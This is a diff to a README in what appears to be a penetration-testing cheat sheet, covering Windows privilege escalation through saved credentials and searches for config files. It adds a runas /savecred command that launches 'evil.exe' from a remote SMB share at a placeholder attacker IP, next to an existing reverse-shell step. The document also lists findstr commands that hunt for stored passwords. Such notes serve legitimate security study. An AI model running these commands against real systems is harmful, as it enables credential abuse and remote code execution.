seeu-inspace/easyg/README.md

 **Saved Credentials**
 1. Check for any saved credentials `cmdkey /list`
-2. Start a listener on the attacker machine and run the reverse shell executable using `runas` with the admin user's saved credentials: `runas /savecred /user:admin C:\PrivEsc\reverse.exe`
+2. Start a listener on the attacker machine and run the reverse shell executable using `runas` with the admin user's saved credentials: `runas /savecred /user:admin C:\PrivEsc\reverse.exe` or `runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"`

 **Search for Configuration Files**
 1. Run the commands: `dir /s *pass* == *.config` and `findstr /si password *.xml *.ini *.txt`